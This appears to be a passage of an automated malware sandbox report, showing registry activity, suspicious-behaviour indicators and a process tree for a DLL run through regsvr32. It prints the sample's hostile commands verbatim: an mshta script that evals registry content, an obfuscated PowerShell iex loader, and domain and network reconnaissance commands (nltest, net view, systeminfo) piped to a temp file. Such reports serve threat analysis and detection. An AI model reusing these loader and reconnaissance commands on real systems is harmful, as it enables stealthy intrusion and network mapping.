Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = e5157fa852a7d801 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = 4f3b44a852a7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\89e438a32df92b68baa99a7b1f853e9c5016ac2f42d270dcdb0f22cca0d53f2e" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000024ed60a752a7d801af8c9ca752a7d801af8c9ca752a7d8017aa10b000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000386231656133646166646331313338306235306237636237313934303836386439663063613365313537383235336564333634373230343837383830366438660000b20009000400efbe03558280035582802e0000000000000000000000000000000000000000000000000002598e00380062003100650061003300640061006600640063003100310033003800300062003500300062003700630062003700310039003400300038003600380064003900660030006300610033006500310035003700380032003500330065006400330036003400370032003000340038003700380038003000360064003800660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38623165613364616664633131333830623530623763623731393430383638643966306361336531353738323533656433363437323034383738383036643866000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8646077a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8646077a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = 127f80a652a7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d82b1ea752a7d80159d8aaa752a7d80159d8aaa752a7d8014aae0d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000393332313463656439373862316633666135633337626465356161373133303261303763613265393436396233373063633131626336313933303830336266330000b20009000400efbe03558280035582802e0000000000000000000000000000000000000000000000000076688200390033003200310034006300650064003900370038006200310066003300660061003500630033003700620064006500350061006100370031003300300032006100300037006300610032006500390034003600390062003300370030006300630031003100620063003600310039003300300038003000330062006600330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c39333231346365643937386231663366613563333762646535616137313330326130376361326539343639623337306363313162633631393330383033626633000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645a77a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645a77a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d63c6516ae1a7e40eea65da02de168692eb5c3f1bf44f97063858c3198e0171" RuntimeBroker.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exepowershell.exeExplorer.EXEpid process 1816 regsvr32.exe 1816 regsvr32.exe 3932 powershell.exe 3932 powershell.exe 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3020 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
powershell.exeExplorer.EXEpid process 3932 powershell.exe 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes:
powershell.exeExplorer.EXERuntimeBroker.exeWMIC.exetasklist.exedescription pid process Token: SeDebugPrivilege 3932 powershell.exe Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3448 RuntimeBroker.exe Token: SeIncreaseQuotaPrivilege 3656 WMIC.exe Token: SeSecurityPrivilege 3656 WMIC.exe Token: SeTakeOwnershipPrivilege 3656 WMIC.exe Token: SeLoadDriverPrivilege 3656 WMIC.exe Token: SeSystemProfilePrivilege 3656 WMIC.exe Token: SeSystemtimePrivilege 3656 WMIC.exe Token: SeProfSingleProcessPrivilege 3656 WMIC.exe Token: SeIncBasePriorityPrivilege 3656 WMIC.exe Token: SeCreatePagefilePrivilege 3656 WMIC.exe Token: SeBackupPrivilege 3656 WMIC.exe Token: SeRestorePrivilege 3656 WMIC.exe Token: SeShutdownPrivilege 3656 WMIC.exe Token: SeDebugPrivilege 3656 WMIC.exe Token: SeSystemEnvironmentPrivilege 3656 WMIC.exe Token: SeRemoteShutdownPrivilege 3656 WMIC.exe Token: SeUndockPrivilege 3656 WMIC.exe Token: SeManageVolumePrivilege 3656 WMIC.exe Token: 33 3656 WMIC.exe Token: 34 3656 WMIC.exe Token: 35 3656 WMIC.exe Token: 36 3656 WMIC.exe Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeIncreaseQuotaPrivilege 3656 WMIC.exe Token: SeSecurityPrivilege 3656 WMIC.exe Token: SeTakeOwnershipPrivilege 3656 WMIC.exe Token: SeLoadDriverPrivilege 3656 WMIC.exe Token: SeSystemProfilePrivilege 3656 WMIC.exe Token: SeSystemtimePrivilege 3656 WMIC.exe Token: SeProfSingleProcessPrivilege 3656 WMIC.exe Token: SeIncBasePriorityPrivilege 3656 WMIC.exe Token: SeCreatePagefilePrivilege 3656 WMIC.exe Token: SeBackupPrivilege 3656 WMIC.exe Token: SeRestorePrivilege 3656 WMIC.exe Token: SeShutdownPrivilege 3656 WMIC.exe Token: SeDebugPrivilege 3656 WMIC.exe Token: SeSystemEnvironmentPrivilege 3656 WMIC.exe Token: SeRemoteShutdownPrivilege 3656 WMIC.exe Token: SeUndockPrivilege 3656 WMIC.exe Token: SeManageVolumePrivilege 3656 WMIC.exe Token: 33 3656 WMIC.exe Token: 34 3656 WMIC.exe Token: 35 3656 WMIC.exe Token: 36 3656 WMIC.exe Token: SeShutdownPrivilege 3448 RuntimeBroker.exe Token: SeShutdownPrivilege 3448 RuntimeBroker.exe Token: SeDebugPrivilege 3144 tasklist.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3020 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
regsvr32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.execmd.exedescription pid process target process PID 844 wrote to memory of 1816 844 regsvr32.exe regsvr32.exe PID 844 wrote to memory of 1816 844 regsvr32.exe regsvr32.exe PID 844 wrote to memory of 1816 844 regsvr32.exe regsvr32.exe PID 4424 wrote to memory of 3932 4424 mshta.exe powershell.exe PID 4424 wrote to memory of 3932 4424 mshta.exe powershell.exe PID 3932 wrote to memory of 516 3932 powershell.exe csc.exe PID 3932 wrote to memory of 516 3932 powershell.exe csc.exe PID 516 wrote to memory of 2720 516 csc.exe cvtres.exe PID 516 wrote to memory of 2720 516 csc.exe cvtres.exe PID 3932 wrote to memory of 696 3932 powershell.exe csc.exe PID 3932 wrote to memory of 696 3932 powershell.exe csc.exe PID 696 wrote to memory of 1932 696 csc.exe cvtres.exe PID 696 wrote to memory of 1932 696 csc.exe cvtres.exe PID 3932 wrote to memory of 3020 3932 powershell.exe Explorer.EXE PID 3932 wrote to memory of 3020 3932 powershell.exe Explorer.EXE PID 3932 wrote to memory of 3020 3932 powershell.exe Explorer.EXE PID 3932 wrote to memory of 3020 3932 powershell.exe Explorer.EXE PID 3020 wrote to memory of 3448 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 3448 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 3448 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 3448 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 3720 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 3720 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 3720 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 3720 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 4104 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 4104 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 4104 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 4104 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 536 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 536 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 536 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 536 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 1860 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 1860 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 2616 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 2616 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 2616 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 2616 3020 Explorer.EXE cmd.exe PID 1860 wrote to memory of 3656 1860 cmd.exe WMIC.exe PID 1860 wrote to memory of 3656 1860 cmd.exe WMIC.exe PID 1860 wrote to memory of 1344 1860 cmd.exe more.com PID 1860 wrote to memory of 1344 1860 cmd.exe more.com PID 3020 wrote to memory of 2616 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 2616 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 5028 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 5028 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 2876 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 2876 3020 Explorer.EXE cmd.exe PID 2876 wrote to memory of 4020 2876 cmd.exe systeminfo.exe PID 2876 wrote to memory of 4020 2876 cmd.exe systeminfo.exe PID 3020 wrote to memory of 3936 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 3936 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 4668 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 4668 3020 Explorer.EXE cmd.exe PID 4668 wrote to memory of 1160 4668 cmd.exe net.exe PID 4668 wrote to memory of 1160 4668 cmd.exe net.exe PID 3020 wrote to memory of 4240 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 4240 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 4452 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 4452 3020 Explorer.EXE cmd.exe PID 4452 wrote to memory of 4388 4452 cmd.exe nslookup.exe PID 4452 wrote to memory of 4388 4452 cmd.exe nslookup.exe PID 3020 wrote to memory of 4448 3020 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll1⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1816
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4104
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3720
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shab='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shab).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nttbepxbbx -value gp; new-alias -name apawnvggm -value iex; apawnvggm ([System.Text.Encoding]::ASCII.GetString((nttbepxbbx "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp" "c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP"5⤵PID:2720
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp" "c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP"5⤵PID:1932
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:2616
-
C:\Windows\system32\cmd.execmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get domain3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3656 -
C:\Windows\system32\more.commore3⤵PID:1344
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:5028
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:4020 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:3936
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:4668 -
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:1160 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:4240
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:4388
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:4448
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:2232
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3144 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:2728
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:3576
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:3936
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:4472
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:3484
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:4616
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:2256
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:3516
-
C:\Windows\system32\net.exenet config workstation3⤵PID:1152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:4456
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:2400
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:1976
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:2588
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:4276
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:4912
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:5012
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:844
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:920
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:4036 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:1092
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:2528
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:4892 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"2⤵PID:5088
-
